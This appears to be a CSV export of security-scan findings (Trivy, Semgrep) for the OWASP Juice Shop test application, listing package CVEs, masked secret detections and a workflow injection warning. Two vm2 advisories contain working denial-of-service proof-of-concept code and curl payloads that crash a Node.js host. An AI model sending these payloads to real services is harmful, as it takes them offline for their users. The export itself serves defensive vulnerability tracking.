NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/tar/package.json,,True,,False,False,,False,,c60a92f856661c39be172a08bd59d952f01cb9ce0ab4554078696b92069dde66,215,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.542834+00:00,,,,,0,[],7.5.10,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-29786 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-29786 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-29786,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-29786 Tar 7.4.3,False,False,,2026-05-12 17:37:05.542783+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-29786,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,7.4.3,2026-05-12 17:37:05.546856+00:00,,,CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N,8.2,22,2026-05-12,,,"tar: tar: File overwrite via drive-relative symlink traversal NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.11 NEWLINE NEWLINE node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/tar/package.json,,True,,False,False,,False,,487d3800ec1f4bc83994a4f7f5171332e25e0b466b663b2574d00d620dbab286,216,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.546918+00:00,,,,,0,[],7.5.11,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-31802 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-31802 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-31802,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-31802 Tar 7.4.3,False,False,,2026-05-12 17:37:05.546866+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-31802,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar-fs,2.1.3,2026-05-12 17:37:05.550765+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N,8.7,22,2026-05-12,,,"tar-fs: tar-fs symlink validation bypass NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.1.1, 2.1.4, 1.16.6 NEWLINE NEWLINE tar-fs provides filesystem bindings for tar-stream. Versions prior to 3.1.1, 2.1.3, and 1.16.5 are vulnerable to symlink validation bypass if the destination directory is predictable with a specific tarball. This issue has been patched in version 3.1.1, 2.1.4, and 1.16.6. A workaround involves using the ignore option on non files/directories. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/tar-fs/package.json,,True,,False,False,,False,,72344e9bebce8d798e4ea2a5a3e51a72cd00ccd5dd078caa8fbcc4f71eb6702c,217,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.550822+00:00,,,,,0,[],"3.1.1, 2.1.4, 1.16.6",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2025-59343 NEWLINE https://github.com/mafintosh/tar-fs NEWLINE https://github.com/mafintosh/tar-fs/commit/0bd54cdf06da2b7b5b95cd4b062c9f4e0a8c4e09 NEWLINE https://github.com/mafintosh/tar-fs/security/advisories/GHSA-vj76-c3g6-qr5v NEWLINE https://lists.debian.org/debian-lts-announce/2025/09/msg00028.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-59343 NEWLINE https://www.cve.org/CVERecord?id=CVE-2025-59343,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-59343 Tar-Fs 2.1.3,False,False,,2026-05-12 17:37:05.550774+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-59343,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],validator,13.15.15,2026-05-12 17:37:05.554964+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P,7.7,792,2026-05-12,,,"Validator is Vulnerable to Incomplete Filtering of One or More Instances of Special Elements NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 13.15.22 NEWLINE NEWLINE Versions of the package validator before 13.15.22 are vulnerable to Incomplete Filtering of One or More Instances of Special Elements in the isLength() function that does not take into account Unicode variation selectors (\uFE0F, \uFE0E) appearing in a sequence which lead to improper string length calculation. This can lead to an application using isLength for input validation accepting strings significantly longer than intended, resulting in issues like data truncation in databases, buffer overflows in other system components, or denial-of-service. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/validator/package.json,,True,,False,False,,False,,9cf5df67a6fc9d05f1213c9df750c95c4d0d6f205e914d02f7c75001bb797b77,218,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.555022+00:00,,,,,0,[],13.15.22,,S1,False,,,,,,,,False,http://seclists.org/fulldisclosure/2026/Jan/27 NEWLINE https://gist.github.com/koral--/ad31208b25b9e3d1e2e35f1d4d72572e NEWLINE https://github.com/validatorjs/validator.js NEWLINE https://github.com/validatorjs/validator.js/commit/d457ecaf55b0f3d8bd379d82757425d0d13dd382 NEWLINE https://github.com/validatorjs/validator.js/pull/2616 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-12758 NEWLINE https://security.snyk.io/vuln/SNYK-JS-VALIDATOR-13653476,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-12758 Validator 13.15.15,False,False,,2026-05-12 17:37:05.554973+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-12758,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.617963+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H,8.6,,,0,2026-05-12,,,"vm2 has a Sandbox Escape via Promise Constructor Unhandled Rejection (Process Crash DoS) NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.0 NEWLINE NEWLINE ### Summary NEWLINE A sandbox escape vulnerability in vm2 v3.10.5 allows any sandboxed code to crash the host Node.js process via a single Promise constructor that triggers an unhandled rejection propagating to the host. The fix for CVE-2026-22709 (v3.10.2) only sanitized the `onRejected` callback in `.then()` and `.catch()` overrides and did not address the executor-to-unhandledRejection path. 
NEWLINE NEWLINE ### Details NEWLINE When sandboxed code creates a `Promise` whose executor sets `Error.name` to a `Symbol()` and then accesses `.stack`, V8's internal `FormatStackTrace` (C++) attempts `Symbol.toString()`, which throws a **host-realm TypeError**. Because this error originates inside the Promise executor and no `.catch()` handler is attached, it becomes an **unhandled rejection** that propagates to the host process. NEWLINE NEWLINE - `lib/setup-sandbox.js:38` — `localPromise` wraps the native `Promise` constructor but does not wrap the executor in try-catch. NEWLINE - `lib/setup-sandbox.js:165-230` — `resetPromiseSpecies` and the `.then()`/`.catch()` overrides sanitize the `onRejected` callback chains, but do not intercept unhandled rejections originating from the executor itself. NEWLINE NEWLINE The CVE-2026-22709 patch (v3.10.2) sanitized `.then()` and `.catch()` callback chains but left the executor-to-unhandledRejection path completely open. NEWLINE NEWLINE **Root Cause**: Promise executor errors are not caught/sanitized before they can propagate as unhandled rejections to the host process, causing an immediate process crash. NEWLINE NEWLINE **`allowAsync: false` does not help**: This setting only blocks `async`/`await` syntax and overrides `.then()`/`.catch()` to throw. The `Promise` constructor itself is still callable. Worse, because `.catch()` is blocked, any rejection from the executor is *guaranteed* to be unhandled — making `allowAsync: false` paradoxically more dangerous than `true` for this vulnerability. 
NEWLINE NEWLINE ### PoC NEWLINE NEWLINE **Library-level PoC (Node.js script — primary):** NEWLINE ```javascript NEWLINE const { VM } = require(""vm2""); NEWLINE NEWLINE // Works with ANY allowAsync setting — both true and false NEWLINE const vm = new VM({ timeout: 5000, allowAsync: false }); NEWLINE NEWLINE try { NEWLINE const result = vm.run(` NEWLINE new Promise(function(r, j) { NEWLINE var e = new Error(); NEWLINE e.name = Symbol(); NEWLINE e.stack; NEWLINE }); NEWLINE `); NEWLINE console.log(""Result:"", result); // Reaches here (returns Promise object) NEWLINE } catch (err) { NEWLINE console.log(""Caught:"", err); // Never executed NEWLINE } NEWLINE NEWLINE console.log(""After try-catch""); // Also prints normally NEWLINE NEWLINE // But on the next microtask tick: NEWLINE // [UnhandledPromiseRejection: TypeError: Cannot convert a Symbol value to a string] NEWLINE // Exit code: 1 NEWLINE // NEWLINE // try-catch cannot help — vm.run() returns synchronously, NEWLINE // the rejection fires asynchronously outside any catch scope. NEWLINE // NEWLINE // NOTE: allowAsync: false only blocks async/await syntax and NEWLINE // .then()/.catch() method calls. The Promise constructor itself NEWLINE // still executes, and the unhandled rejection still propagates. NEWLINE // In fact, allowAsync: false makes it WORSE — .catch() is blocked, NEWLINE // so the rejection is guaranteed to be unhandled. NEWLINE ``` NEWLINE NEWLINE **HTTP demonstration (web service impact):** NEWLINE ```bash NEWLINE # 1. Confirm server is running NEWLINE curl -s http://localhost:3000/api/execute \ NEWLINE -X POST -H ""Content-Type: application/json"" \ NEWLINE -d '{""code"":""\""alive\""""}' NEWLINE # => {""output"":[],""errors"":[],""result"":""\""alive\"""",""executionTime"":1} NEWLINE NEWLINE # 2. 
Send payload — server process will crash NEWLINE curl -s -X POST http://localhost:3000/api/execute \ NEWLINE -H ""Content-Type: application/json"" \ NEWLINE -d '{""code"":""new Promise(function(r,j){var e=new Error();e.name=Symbol();e.stack})""}' NEWLINE NEWLINE # 3. Server is dead (connection refused until restart) NEWLINE curl -s http://localhost:3000/ # => connection refused NEWLINE ``` NEWLINE NEWLINE ### Impact NEWLINE - **DoS**: A single request crashes the entire host Node.js process. All concurrent users lose service immediately. In Node.js 15+, unhandled rejections terminate the process by default — no special configuration is required for the crash to occur. NEWLINE - **Persistent DoS despite restart policies**: Even when container orchestration (Docker restart policy, Kubernetes liveness probes, PM2, etc.) automatically restarts the crashed process, an attacker can send repeated requests to crash the process again before it fully recovers. In our testing, a single `curl` request caused the Docker container to restart (confirmed via `StartedAt` timestamp change), and sending the next request immediately after restart triggered another crash. This creates a **continuous denial-of-service loop** where the service never becomes available to legitimate users — each restart is met with another crash before any real request can be served. NEWLINE - **Amplification**: A single HTTP request (~150 bytes) terminates the entire host process serving all users. The cost to the attacker is negligible compared to the impact. NEWLINE - **Scope**: **All applications using vm2, regardless of `allowAsync` setting.** `allowAsync: false` only blocks `async`/`await` syntax and `.then()`/`.catch()` method calls — the `Promise` constructor itself still executes, and the unhandled rejection still propagates. In fact, `allowAsync: false` makes the vulnerability *worse* because `.catch()` is blocked, guaranteeing the rejection is always unhandled. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,76ac1f1334c97b4c868baabd46d5ede3fe6647461e966320b7c2b52cbf98b8e0,234,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.618016+00:00,,,,,0,[],3.11.0,,S1,False,,,,,,,,False,https://github.com/advisories/GHSA-99p7-6v5w-7xg8 NEWLINE https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.0 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-hw58-p9xv-2mjh,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-44001 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.617970+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-44001,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.622223+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,0,2026-05-12,,,"vm2 Sandbox Access to Host Buffer.alloc Allows timeout Bypass Resulting in Memory Exhaustion NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.0 NEWLINE NEWLINE ### Summary NEWLINE Sandboxed code can call `Buffer.alloc()` with an arbitrary size to allocate memory directly on the host heap. Because `Buffer.alloc` is a synchronous C++ native call, vm2's `timeout` option cannot interrupt it. A single request can exhaust host memory and crash the process with a `FATAL ERROR: Reached heap limit`. NEWLINE NEWLINE ### Details NEWLINE In `lib/vm.js:58`, `Buffer` is exposed to the sandbox through the `HOST` object. The bridge proxy (`lib/bridge.js`) passes `Buffer.alloc()` calls to the host without any size validation. 
NEWLINE NEWLINE Key technical distinction from regular JavaScript memory exhaustion (e.g., `while(true) a.push(...)`): NEWLINE - **JavaScript loops**: V8 can interrupt via timeout — vm2's `timeout` option works NEWLINE - **`Buffer.alloc(N)`**: Executes as a single synchronous C++ call — V8 timeout has no opportunity to interrupt NEWLINE NEWLINE This means: NEWLINE 1. `timeout: 5000` does NOT protect against this attack NEWLINE 2. A single call allocates the entire requested size at once NEWLINE 3. In memory-constrained environments (Docker, Lambda, Kubernetes pods), this causes immediate OOM crash NEWLINE NEWLINE Tested amplification factor: ~100 bytes HTTP request — 1,000,000:1 or greater (100 bytes request to 100MB+ host heap allocation). NEWLINE NEWLINE ### PoC NEWLINE NEWLINE **Library-level PoC (Node.js script — primary):** NEWLINE ```javascript NEWLINE const { VM } = require(""vm2""); NEWLINE const vm = new VM({ timeout: 5000 }); NEWLINE NEWLINE // Buffer.alloc bypasses timeout — allocates 100MB on host heap NEWLINE const result = vm.run(`Buffer.alloc(1024*1024*100).length`); NEWLINE console.log(result); // 104857600 — timeout had no effect NEWLINE NEWLINE // Control test — JavaScript loop IS caught by timeout NEWLINE try { NEWLINE vm.run(`var a=[]; while(true) a.push(1)`); NEWLINE } catch(e) { NEWLINE console.log(e.message); // ""Script execution timed out after 5000ms"" NEWLINE } NEWLINE ``` NEWLINE NEWLINE **HTTP demonstration (OOM crash):** NEWLINE ```bash NEWLINE # 1. Confirm server is running NEWLINE curl -s http://localhost:3000/api/execute \ NEWLINE -X POST -H ""Content-Type: application/json"" \ NEWLINE -d '{""code"":""\""alive\""""}' NEWLINE # => {""result"":""\""alive\""""} NEWLINE NEWLINE # 2. 
Send Buffer.alloc payload — process crashes with OOM NEWLINE curl -s -X POST http://localhost:3000/api/execute \ NEWLINE -H ""Content-Type: application/json"" \ NEWLINE -d '{""code"":""Buffer.alloc(1024*1024*100).length""}' NEWLINE # => empty response (process died) NEWLINE NEWLINE # 3. Check server logs: NEWLINE # FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory NEWLINE NEWLINE # Control test — JavaScript loop IS caught by timeout: NEWLINE curl -s -X POST http://localhost:3000/api/execute \ NEWLINE -H ""Content-Type: application/json"" \ NEWLINE -d '{""code"":""var a=[]; while(true) a.push(1)""}' NEWLINE # => {""errors"":[""Script execution timed out after 5000ms""]} NEWLINE # Server stays alive — timeout works for JS, but NOT for Buffer.alloc NEWLINE ``` NEWLINE NEWLINE ### Impact NEWLINE - **DoS**: A single HTTP request crashes the host Node.js process via OOM. The `timeout` option provides no protection. NEWLINE - **Environment-dependent severity**: NEWLINE - **Memory-constrained environments** (Docker with memory limits, Kubernetes pods, Lambda): The allocation exceeds the memory limit, causing immediate process termination via OOM. This is the primary threat scenario — `FATAL ERROR: Reached heap limit` was confirmed in testing. NEWLINE - **Unconstrained environments**: The allocation succeeds and memory is reclaimed by GC after the request completes, resulting in temporary performance degradation rather than a crash. NEWLINE - **Scope**: All applications using vm2. Default configuration is vulnerable. Memory-constrained environments (Docker, Kubernetes, Lambda) are most severely impacted. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,c7324afbcc4f243499b8d6ead879f41542c6be7e1c25561edf75ff6a631ab4af,235,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.622283+00:00,,,,,0,[],3.11.0,,S1,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.0 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-6785-pvv7-mvg7,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-44004 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.622233+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-44004,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],ws,7.4.6,2026-05-12 17:37:05.646012+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,476,2026-05-12,,,"nodejs-ws: denial of service when handling a request with many HTTP headers NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 5.2.4, 6.2.3, 7.5.10, 8.17.1 NEWLINE NEWLINE ws is an open source WebSocket client and server for Node.js. A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server. The vulnerability was fixed in ws@8.17.1 (e55e510) and backported to ws@7.5.10 (22c2876), ws@6.2.3 (eeb76d3), and ws@5.2.4 (4abd8f6). In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent. 2. Set server.maxHeadersCount to 0 so that no limit is applied. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/engine.io/node_modules/ws/package.json,,True,,False,False,,False,,7ba8c33b64da51d8c714ca44cc31ddf1f4ded1cbe10d6221172a0c8eccafdcc4,241,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.646068+00:00,,,,,0,[],"5.2.4, 6.2.3, 7.5.10, 8.17.1",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2024-37890 NEWLINE https://github.com/websockets/ws NEWLINE https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f NEWLINE https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e NEWLINE https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c NEWLINE https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63 NEWLINE https://github.com/websockets/ws/issues/2230 NEWLINE https://github.com/websockets/ws/pull/2231 NEWLINE https://github.com/websockets/ws/security/advisories/GHSA-3h5v-q93c-6h6q NEWLINE https://nodejs.org/api/http.html#servermaxheaderscount NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2024-37890 NEWLINE https://www.cve.org/CVERecord?id=CVE-2024-37890,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2024-37890 Ws 7.4.6,False,False,,2026-05-12 17:37:05.646020+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2024-37890,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],,,2026-05-12 17:37:05.649832+00:00,,,,,0,2026-05-12,,,Asymmetric Private Key NEWLINE **Category:** AsymmetricPrivateKey NEWLINE **Match:** ----BEGIN RSA PRIVATE 
KEY-----****************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************-----END RSA PRIVATE NEWLINE ,False,,,False,,,,False,/juice-shop/build/lib/insecurity.js,,True,,False,False,,False,,5ad948478ac7188141e618ebe6b972ef0264605097a5df62b237c8cfba18dc45,242,,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.649887+00:00,47,,,,0,[],,,S1,False,,,,,,,,False,,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,Secret Detected in /juice-shop/build/lib/insecurity.js - Asymmetric Private Key,False,False,,2026-05-12 17:37:05.649841+00:00,,False,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,,secret,Active, +,,True,0,[],,,2026-05-12 17:37:04.510304+00:00,,,,,78,2026-05-12,,,"**Result message:** Using variable interpolation `${{...}}` with `github` context data in a `run:` step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. `github` context data can have arbitrary user input and should be treated as untrusted. Instead, use an intermediate environment variable with `env:` to store the data and use the environment variable in the `run:` script. 
Be sure to use double-quotes the environment variable, like this: ""$ENVVAR"". NEWLINE ",False,,,False,,,,False,/src/.github/workflows/update-challenges-ebook.yml,,,,False,False,,False,,3054b8f839b1b9d3e981f8b4e46a8f032ad1015eb9b56f72610783dd64fd01a2,1,,False,,False,2026-05-12 17:37:04.489502+00:00,Admin User (admin),1,2026-05-12 17:37:04.510374+00:00,21,,,,0,[],,1,S1,False,,,,,,,,False,https://docs.github.com/en/actions/learn-github-actions/security-hardening-for-github-actions#understanding-the-risk-of-script-injections NEWLINE https://securitylab.github.com/research/github-actions-untrusted-input/,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Semgrep JSON Report,2,0,yaml.github-actions.security.run-shell-injection.run-shell-injection,False,False,,2026-05-12 17:37:04.510314+00:00,,False,,yaml.github-actions.security.run-shell-injection.run-shell-injection,,Semgrep JSON Report,1,Labs Security Testing,1,Juice Shop,,,,Active, +,,True,0,[],,,2026-05-12 17:37:05.652908+00:00,,,,,0,2026-05-12,,,"JWT token NEWLINE **Category:** JWT NEWLINE **Match:** ocalStorage.setItem('token', '***********************************************************************************************************************************************************') NEWLINE ",False,,,False,,,,False,/juice-shop/frontend/src/app/app.guard.spec.ts,,True,,False,False,,False,,cc6334f2f6869e79290dd6ba150a78373e43daaf027248c6b5cef20fb87c702d,243,,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.652964+00:00,38,,,,0,[],,,S2,False,,,,,,,,False,,Admin User (admin),1,,,False,,,,,,,Medium,,,90,90,2026-08-10,2026-08-10,,,,True,,Trivy Scan,3,0,Secret Detected in /juice-shop/frontend/src/app/app.guard.spec.ts - JWT Token,False,False,,2026-05-12 17:37:05.652917+00:00,,False,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,,secret,Active, +,,True,0,[],vm2,3.9.17,2026-05-12 
17:37:05.626629+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N,5.3,,,74,2026-05-12,,,vm2: Inspect Manipulation NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.9.18 NEWLINE NEWLINE vm2 is a sandbox that can run untrusted code with Node's built-in modules. In versions 3.9.17 and lower of vm2 it was possible to get a read-write reference to the node `inspect` method and edit options for `console.log`. As a result a threat actor can edit options for the `console.log` command. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. Users unable to upgrade may make the `inspect` method readonly with `vm.readonly(inspect)` after creating a vm. NEWLINE ,False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,5fb6af946fd3dca184989d4aa3c55572e1db77bdbe8263c1baf049274761808f,236,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.626685+00:00,,,,,0,[],3.9.18,,S2,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2023-32313 NEWLINE https://gist.github.com/arkark/c1c57eaf3e0a649af1a70c2b93b17550 NEWLINE https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/commit/5206ba25afd86ef547a2c9d48d46ca7a9e6ec238 NEWLINE https://github.com/patriksimek/vm2/releases/tag/3.9.18 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-p5gc-c584-jj6v NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2023-32313 NEWLINE https://www.cve.org/CVERecord?id=CVE-2023-32313,Admin User (admin),1,,,False,,,,,,,Medium,,,90,90,2026-08-10,2026-08-10,,,,True,,Trivy Scan,3,0,CVE-2023-32313 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.626638+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2023-32313,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],notevil,1.3.3,2026-05-12 17:37:05.395861+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N,6.5,,,1321,2026-05-12,,,"Sandbox escape in 
notevil and argencoders-notevil NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** NEWLINE NEWLINE This affects all versions of package notevil; all versions of package argencoders-notevil. It is vulnerable to Sandbox Escape leading to Prototype pollution. The package fails to restrict access to the main context, allowing an attacker to add or modify an object's prototype. **Note:** This vulnerability derives from an incomplete fix in [SNYK-JS-NOTEVIL-608878](https://security.snyk.io/vuln/SNYK-JS-NOTEVIL-608878). NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/notevil/package.json,,False,,False,False,,False,,3a6874fa5fa6840d961fde6018b4c34d819ae477a711f7ed9ce20ba68b9a692b,178,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.395914+00:00,,,,,0,[],,,S2,False,,,,,,,,False,https://github.com/mmckegg/notevil NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2021-23771 NEWLINE https://snyk.io/vuln/SNYK-JS-ARGENCODERSNOTEVIL-2388587 NEWLINE https://snyk.io/vuln/SNYK-JS-NOTEVIL-2385946,Admin User (admin),1,,,False,,,,,,,Medium,,,90,90,2026-08-10,2026-08-10,,,,True,,Trivy Scan,3,0,CVE-2021-23771 Notevil 1.3.3,False,False,,2026-05-12 17:37:05.395868+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2021-23771,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],libc6,2.36-9+deb12u10,2026-05-12 17:37:04.814037+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L,5.3,,,617,2026-05-12,,,"glibc: glibc: Denial of Service via iconv() function with specific character sets NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** NEWLINE NEWLINE The iconv() function in the GNU C Library versions 2.43 and earlier may crash due to an assertion failure when converting inputs from the IBM1390 or IBM1399 character sets, which may be used to remotely crash an application. 
NEWLINE NEWLINE NEWLINE NEWLINE This vulnerability can be trivially mitigated by removing the IBM1390 and IBM1399 character sets from systems that do not need them. NEWLINE ",False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,False,,False,False,,False,,96ef8ea31a4000ef8b660117d1471f0080f79438338afded4dd68f53d5735bb1,33,fix_deferred,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.814133+00:00,,,,,0,[],,,S2,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-4046 NEWLINE https://inbox.sourceware.org/libc-announce/76814edf-cf7f-47ec-979d-2dce0a2c76bf@gotplt.org/T/#u NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-4046 NEWLINE https://packages.fedoraproject.org/pkgs/glibc/glibc-gconv-extra/ NEWLINE https://sourceware.org/bugzilla/show_bug.cgi?id=33980 NEWLINE https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0007 NEWLINE https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0007;hb=HEAD NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-4046,Admin User (admin),1,,,False,,,,,,,Medium,,,90,90,2026-08-10,2026-08-10,,,,True,,Trivy Scan,3,0,CVE-2026-4046 Libc6 2.36-9+deb12u10,False,False,,2026-05-12 17:37:04.814050+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-4046,debian; os-pkgs,"Active, Verified", +,,True,0,[],libc6,2.36-9+deb12u10,2026-05-12 17:37:04.818136+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L,6.5,,,125,2026-05-12,,,"glibc: glibc: Incorrect DNS response parsing via crafted DNS server response NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** NEWLINE 